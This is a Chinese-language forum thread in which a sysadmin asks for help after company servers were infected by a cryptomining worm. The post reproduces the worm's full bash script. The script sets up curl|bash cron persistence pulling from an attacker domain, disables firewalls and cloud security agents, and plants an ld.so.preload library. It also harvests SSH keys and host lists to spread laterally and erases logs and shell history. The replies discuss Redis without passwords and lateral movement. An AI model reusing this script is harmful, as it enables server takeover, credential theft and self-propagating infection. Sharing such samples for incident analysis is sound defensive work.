V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
lamesbond
V2EX  ›  服务器

公司服务器被挖矿的入侵了

 •  
 •   lamesbond · 265 天前 · 2496 次点击
  这是一个创建于 265 天前的主题,其中的信息可能已经有所发展或是发生改变。

  今早登录服务器发现定时任务被篡改了,改成下面这样 30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh 看脚本发现有挖矿程序,有一台被入侵的服务器 cpu 内存拉满,其他的都正常,怀疑是 redis 入侵,redis 没设密码,但有一台没装 redis 的也被入侵了,排查半天不知道服务器怎么被入侵的,大佬们帮忙看看,脚本如下: #!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/dev/null ulimit -n 65535 ufw disable iptables -F echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf sysctl -w vm.nr_hugepages=$((1168+$(nproc))) echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s//.//g" | xargs -I % kill -9 % netstat -antp | grep '23.94.24.12' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % netstat -antp | grep '134.122.17.13' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % netstat -antp | grep '66.70.218.40' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % netstat -antp | grep '209.141.35.17' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % echo "123" netstat -antp | grep '119.28.4.91' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % netstat -antp | grep '101.32.73.178' | awk '{print $7}' | sed -e 's//.//g' | xargs -I % kill -9 % netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 % ps -fe | grep '/usr/sbin/sshd' | grep 'sshgood' | grep -v grep | awk '{print $2}' | sed -e 's//.//g' | xargs -I % kill -9 % ps aux | grep -a -E "kdevtmpfsi|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9

  der(){ if ps aux | grep -i '[a]liyun'; then (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove rm -rf /usr/local/cloudmonitor elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi sleep 1 echo "DER Uninstalled" }

  der if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi echo $DLB url="w.apacheorg.top:1234" liburl="http://w.apacheorg.top:1234/.libs"

  cronlow(){ cr=$(crontab -l | grep -q $url | wc -l) if [ ${cr} -eq 0 ];then crontab -r (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab - else echo "cronlow skip" fi }

  kills() { /bin/ps axf -o "pid %cpu command" |grep -v river | awk '{if($2>50.0) print $1}' | while read procid do kill -9 $procid done }

  kills if [ -w /usr/sbin ]; then SPATH=/usr/sbin else SPATH=/tmp fi echo $SPATH

  echo 'handling download itself ...' if cat /etc/cron.d/whoami /etc/cron.d/apache /var/spool/cron/whoami /var/spool/cron/crontabs/whoami /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151|5.196.247.12|bash.givemexyz.xyz|194.156.99.30|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==|bash.givemexyz.in|205.185.116.78" then chattr -i -a /etc/cron.d/whoami /etc/cron.d/apache /var/spool/cron/whoami /var/spool/cron/crontabs/whoami /etc/cron.hourly/oanacroner1 crontab -r fi if crontab -l | grep "$url" then echo "Cron exists" else apt-get install -y cron yum install -y vixie-cron crontabs service crond start chkconfig --level 35 crond on echo "Cron not found" echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/whoami echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/whoami mkdir -p /var/spool/cron/crontabs echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/whoami mkdir -p /etc/cron.hourly echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1 echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down chattr +ai -V /etc/cron.d/whoami /etc/cron.d/apache /var/spool/cron/whoami /var/spool/cron/crontabs/whoami /etc/cron.hourly/oanacroner1 /etc/init.d/down fi chattr -i -a /etc/cron.d/whoami /etc/cron.d/apache /var/spool/cron/whoami /var/spool/cron/crontabs/whoami /etc/cron.hourly/oanacroner1 echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/down

  localgo() { echo "localgo start" myhostip=$(curl -sL icanhazip.com) KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub) KEYS2=$(cat ~/.ssh/config /home//.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }') KEYS3=$(cat ~/.bash_history /home//.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'}) KEYS4=$(find ~/ /root /home -maxdepth 3 -name '.pem' | uniq) HOSTS=$(cat ~/.ssh/config /home//.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}') HOSTS2=$(cat ~/.bash_history /home//.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}") HOSTS3=$(cat ~/.bash_history /home//.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}') HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}') HOSTS5=$(cat ~//.ssh/known_hosts /home//.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | uniq) HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}.){3}[0-9]{1,3}" | grep ":22" | uniq) USERZ=$( echo "root" find ~/ /root /home -maxdepth 2 -name '.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh" ) USERZ2=$(cat ~/.bash_history /home//.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq) sshports=$(cat ~/.bash_history /home//.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "$a22") userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/./d') hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) i=0 for user in $userlist; do for host in $hostlist; do for key in $keylist; do for sshp in $sshports; do ((i++)) if [ "${i}" -eq "20" ]; then sleep 5 ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null & i=0 fi

     #Wait 5 seconds after every 20 attempts and clean up hanging processes
  
     chmod +r $key
     chmod 400 $key
     echo "[email protected]$host"
     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key [email protected]$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key [email protected]$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
    done
   done
  done
  

  done

  scangogo

  echo "local done" }

  MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283" MD5_2_XMR=md5sum $SPATH/.libs | awk '{print $1}'

  if [ "$SPATH" = "/usr/sbin" ] then chattr -ia / /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null if [ "$MD5_1_XMR" = "$MD5_2_XMR" ] then if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $DLB $SPATH/.inis http://$url/inis chmod +x $SPATH/.inis 2>/dev/null $SPATH/.inis else echo "ok" chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo fi localgo else chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null chattr -ai /usr/sbin/.libs 2>/dev/null chattr -ai /usr/sbin/.inis 2>/dev/null rm -f $SPATH/.libs rm -f $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB /usr/local/lib/libs.so http://$url/libs.so $DLB $SPATH/.ini http://$url/inis echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ia /usr/local/lib/libs.so chattr +ia /usr/local/lib/inis.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo fi else if [ "$MD5_1_XMR" != "$MD5_2_XMR" ] then chattr -ai $SPATH/.libs chattr -ai $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB $SPATH/.inis http://$url/inis chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so chattr +ia /usr/local/lib/libs.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo cronlow else cronlow if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then nohup $SPATH/.inis 1>/dev/null 2>&1 & else echo "ok" fi fi fi

  echo 0>/root/.ssh/authorized_keys echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron echo 0>~/.bash_history history -c 2>/dev/nul

  15 条回复    2021-03-21 18:23:30 +08:00
  kokutou
      1
  kokutou  
     265 天前 via Android
  没装 redis 的是从装了 redis 的这台跳过去的吧。。。
  redis 不设密码想啥呢。。。
  DUWENINK
      2
  DUWENINK  
     265 天前
  我也是今天刚中的 我也是 redis 没设置密码 有清除这个病毒的脚本吗
  n0th1n9
      3
  n0th1n9  
     265 天前
  lamesbond
      4
  lamesbond  
  OP
     265 天前
  @kokutou 我找了几台中招的服务器的 redis 日志,都没查出有关侵入的痕迹
  lamesbond
      5
  lamesbond  
  OP
     265 天前
  我看网上 redis 被攻击的都是 redis 端口暴露在公网了,我这中招的都是内网的服务器,有些 nginx,tomcat,java 服务的端口是通过路由器 nat 转发暴露在公网的,但 redis 没有在公网暴露端口
  branchWater
      6
  branchWater  
     265 天前
  我公司前段时间一台服务器的 mongodb 没有设密码也是被入侵了。
  learningman
      7
  learningman  
     265 天前 via Android
  只要有一台没了,病毒就可以内网平移
  (是这个词吧)
  des
      8
  des  
     265 天前
  你自己都说了 是 redis 入侵,redis 没设密码。
  你说想咋问怎么入侵的?!
  zszhere
      9
  zszhere  
     265 天前 via iPhone
  如果有重要数据 找专业的安全服务处理吧 你这是边界被打穿后被内网漫游了 大部分是挖矿蠕虫自己打的 少部分是人工攻击。看下你的.ssh 目录里面会多了公钥,还会修改你的二进制文件,还有增加定时任务。
  lamesbond
      10
  lamesbond  
  OP
     265 天前
  @zszhere 谢谢指点,看了几篇内网漫游的文章,感觉只要有服务暴露在公网,黑客就有办法入侵,已经超出我的理解范围了,我还是恢复数据然后重装系统吧,密码设复杂点
  lamesbond
      11
  lamesbond  
  OP
     264 天前
  @DUWENINK 杀不干净的,我直接备份数据重装系统了
  andychen1101101
      12
  andychen1101101  
     262 天前
  发现是 nginx 被攻击了,重装系统也没用
  lamesbond
      13
  lamesbond  
  OP
     260 天前
  https://bbs.pediy.com/thread-262790.htm
  找到一篇讲这个病毒的文章,和我的情况及其相似,今天发现 aws 上有一台 ec2 也中毒了,运维同事都注意一下
  Gav1n1995
      14
  Gav1n1995  
     256 天前
  去年个人服务器也是 redis 没设密码被入侵了
  lamesbond
      15
  lamesbond  
  OP
     255 天前
  基本确定是 ssh 被爆破了,应该是有内网服务器被黑了,进而侵入其他服务器。
  但是 aws 上的 ec2 只能普通用户登录,还要加密钥,redis 绑定的 127.0.0.1,这都被黑了,太恐怖了
  关于   ·   帮助文档   ·   API   ·   FAQ   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   3832 人在线   最高记录 5497   ·     Select Language
  创意工作者们的社区
  World is powered by solitude
  VERSION: 3.9.8.5 · 40ms · UTC 07:36 · PVG 15:36 · LAX 23:36 · JFK 02:36
  ♥ Do have faith in what you're doing.